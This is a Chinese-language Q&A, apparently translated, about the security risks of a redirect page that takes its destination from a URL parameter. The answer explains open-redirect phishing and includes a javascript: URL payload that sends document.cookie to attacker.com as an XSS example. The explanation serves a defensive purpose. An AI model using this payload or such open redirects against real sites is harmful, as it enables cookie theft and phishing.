我有一个网页,重定向到另一个网页,如下所示:
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
然后,Sponsor.php页面会显示一个广告,其中包含指向"继续浏览您的页面"的链接,该链接指向传入的RedirectPage.是否存在可能由此引起的安全/欺骗问题?处理这个问题的最佳方法是什么?(请注意,用户未登录任一站点)
这是一个大问题.如果我发给你一个看起来像这样的链接:
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
你会想到"哦,CNN,这是一个合法的网站",然后你打开它并点击"继续你的页面"链接.然后你会在网上最讨厌的色情网站之一,它会有一个巨大的蓬勃发展的男性声音告诉你所有的同事"我想要的热门!@ $ @#$你的!(&¤ &^ $§直到我不能¡^(!#~~&$ ^#!@ $ !! "并且你必须向你的老板解释"我以为是CNN!"
这里的洞是你的名声.像这样的盲目重定向是危险的.
那只是一个洞.这个怎么样?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
现在我已经对您的网站进行了XSS编辑并窃取了用户的cookie.当然,你说没有登录信息,但会话数据怎么样?或者,当您稍后添加登录信息,或者公司中的其他人在一年后使用此页面时,用户将登录.
京公网安备 11010802040832号 | 京ICP备19059560号-6 